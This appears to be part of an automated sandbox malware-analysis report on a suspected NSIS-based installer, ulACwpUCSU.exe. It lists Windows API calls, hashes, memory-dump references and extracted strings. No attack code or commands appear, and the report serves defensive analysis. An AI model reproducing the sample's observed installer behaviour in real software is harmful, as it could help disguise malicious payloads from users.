                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 36591f86aa2c1f2adefcdb7238d8e5e1d903d288247f27f70a02a30479273739
                                          • Instruction ID: 4daead48d26ae6742cc4751adb680189456718570d67c7320b978f12710e1ab5
                                          • Opcode Fuzzy Hash: 36591f86aa2c1f2adefcdb7238d8e5e1d903d288247f27f70a02a30479273739
                                          • Instruction Fuzzy Hash: DFD0C7B7B141006BD750E7B86E8545A73E8F75135A7148837D502E1191D17DC9415519
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                          • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                          • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                          • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 004049B4
                                          • GetDlgItem.USER32(?,00000408), ref: 004049BF
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A09
                                          • LoadBitmapA.USER32(0000006E), ref: 00404A1C
                                          • SetWindowLongA.USER32(?,000000FC,00404F93), ref: 00404A35
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A49
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A5B
                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404A71
                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A7D
                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A8F
                                          • DeleteObject.GDI32(00000000), ref: 00404A92
                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404ABD
                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404AC9
                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B5E
                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B89
                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B9D
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404BCC
                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404BDA
                                          • ShowWindow.USER32(?,00000005), ref: 00404BEB
                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404CE8
                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D4D
                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D62
                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D86
                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DA6
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 00404DBB
                                          • GlobalFree.KERNEL32(00000000), ref: 00404DCB
                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E44
                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404EED
                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EFC
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F1C
                                          • ShowWindow.USER32(?,00000000), ref: 00404F6A
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F75
                                          • ShowWindow.USER32(00000000), ref: 00404F7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 1638840714-813528018
                                          • Opcode ID: 48884298102dd397bd7c84c821747a4fdce173a69a1f3747addc236cef338d07
                                          • Instruction ID: ec1b41ef9246f4b5ca9c31e675ea93c5522bc938a585a88f05d0904c7564d9ec
                                          • Opcode Fuzzy Hash: 48884298102dd397bd7c84c821747a4fdce173a69a1f3747addc236cef338d07
                                          • Instruction Fuzzy Hash: 7A025FB0900209AFEB10DF94DC85AAE7BB5FB84315F10817AFA10B62E1D7789D42DF58
                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404479
                                          • SetWindowTextA.USER32(00000000,?), ref: 004044A3
                                          • SHBrowseForFolderA.SHELL32(?,0041F0D0,?), ref: 00404554
                                          • CoTaskMemFree.OLE32(00000000), ref: 0040455F
                                          • lstrcmpiA.KERNEL32(Call,Supersuspicion Setup: Installing), ref: 00404591
                                          • lstrcatA.KERNEL32(?,Call), ref: 0040459D
                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045AF
                                            • Part of subcall function 0040552E: GetDlgItemTextA.USER32(?,?,00000400,004045E6), ref: 00405541
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00405FF9
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040600B
                                            • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040601B
                                          • GetDiskFreeSpaceA.KERNEL32(0041ECC8,?,?,0000040F,?,0041ECC8,0041ECC8,?,00000000,0041ECC8,?,?,000003FB,?), ref: 0040466C
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404687
                                            • Part of subcall function 004047E0: lstrlenA.KERNEL32(Supersuspicion Setup: Installing,Supersuspicion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                            • Part of subcall function 004047E0: wsprintfA.USER32 ref: 00404886
                                            • Part of subcall function 004047E0: SetDlgItemTextA.USER32(?,Supersuspicion Setup: Installing), ref: 00404899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: A$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$Supersuspicion Setup: Installing
                                          • API String ID: 2624150263-3564628124
                                          • Opcode ID: 460c116a5067c679cb5b5ce948a3056466bcf158c5435e38ad8be33a97865feb
                                          • Instruction ID: 5a451af96f6c61f8b8aedc9e732e962e3b59a2a539d705b9404eba0a1a8e20eb
                                          • Opcode Fuzzy Hash: 460c116a5067c679cb5b5ce948a3056466bcf158c5435e38ad8be33a97865feb
                                          • Instruction Fuzzy Hash: A6A162B1900208ABDB11AFA6CD45AEFB7B9EF85314F10843BF611B72D1D77C89418B69
                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 21f2deb84e4fe94a37f3c530ba23b3725dbfe4e9087708a3ee461911f2001047
                                          • Instruction ID: 2b7524724565807a685c72c68d6b6eabb337ae57375c882a310f3ed35d4a28aa
                                          • Opcode Fuzzy Hash: 21f2deb84e4fe94a37f3c530ba23b3725dbfe4e9087708a3ee461911f2001047
                                          • Instruction Fuzzy Hash: D4F0EC72504110EBD700EBB4994DAEE77B8DF51314F60457BE141F21C1D3B84945E72E
                                          APIs
                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                          • GetSysColor.USER32(?), ref: 00404203
                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                          • lstrlenA.KERNEL32(?), ref: 00404224
                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                          • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                          • SendMessageA.USER32(00000000), ref: 004042AD
                                          • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                          • SetCursor.USER32(00000000), ref: 00404330
                                          • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                          • SetCursor.USER32(00000000), ref: 00404353
                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404393
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                          • String ID: Call$N$open
                                          • API String ID: 3615053054-2563687911
                                          • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                          • Instruction ID: 47d1c741c4840d0b501b4796cf3fe0e3440e9ec9cd7b0debe1a5eac4f9bfffd7
                                          • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                          • Instruction Fuzzy Hash: 8F61A0B1A40309BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                                          APIs
                                          • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405A7E
                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405C12,?,?,00000001,004057B5,?,00000000,000000F1,?), ref: 00405AA2
                                          • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405AAB
                                            • Part of subcall function 0040592C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                            • Part of subcall function 0040592C: lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                          • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405AC8
                                          • wsprintfA.USER32 ref: 00405AE6
                                          • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,00000004,00421E88,?,?,?,?,?), ref: 00405B21
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B30
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B68
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BBE
                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BD0
                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD7
                                          • CloseHandle.KERNEL32(00000000), ref: 00405BDE
                                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 004059CB
                                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                          • String ID: %s=%s$NUL$[Rename]
                                          • API String ID: 1265525490-4148678300
                                          • Opcode ID: 042e64ae17e7c47ef1d56a04f1dfe6ef41ae4142583f66b70c6923dd5e444e24
                                          • Instruction ID: 2d1e09aab0418ff75005a817fdb93eb8b9645243d234663ae25a64343302d3c0
                                          • Opcode Fuzzy Hash: 042e64ae17e7c47ef1d56a04f1dfe6ef41ae4142583f66b70c6923dd5e444e24
                                          • Instruction Fuzzy Hash: BE41DEB1604A15BFD6206B219C49F6B3A6CDF45718F14053BBE01FA2D2EA7CB8018E7D
                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                          • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                                          • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                          • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                          APIs
                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00405FF9
                                          • CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040600B
                                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040601B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-2528599275
                                          • Opcode ID: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                                          • Instruction ID: 96a923a8ee4f60b6f191beee89bac6a1f57d38d5d4ddb578b75945660f6dc773
                                          • Opcode Fuzzy Hash: cac177dc58e6cdce4745106bcf32f060ca56d97be21c35c0cc42ba282efa81fa
                                          • Instruction Fuzzy Hash: 57110451908B9229FB325A284C40B777F99CF5A760F18047FE5C1722C2C67C5C529B6E
                                          APIs
                                          • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                          • GetSysColor.USER32(00000000), ref: 0040408C
                                          • SetTextColor.GDI32(?,00000000), ref: 00404098
                                          • SetBkMode.GDI32(?,?), ref: 004040A4
                                          • GetSysColor.USER32(?), ref: 004040B7
                                          • SetBkColor.GDI32(?,?), ref: 004040C7
                                          • DeleteObject.GDI32(?), ref: 004040E1
                                          • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                          • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                                          • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                          • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                          • String ID:
                                          • API String ID: 3730416702-0
                                          APIs
                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                          • GlobalFree.KERNEL32(?), ref: 100024B9
                                          • GlobalFree.KERNEL32(00000000), ref: 100024F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                          • GlobalFree.KERNEL32(?), ref: 0040272C
                                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                          • GlobalFree.KERNEL32(00000000), ref: 00402745
                                          • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID:
                                          • API String ID: 3294113728-0
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                          • GetTickCount.KERNEL32 ref: 00402C10
                                          • wsprintfA.USER32 ref: 00402C3E
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
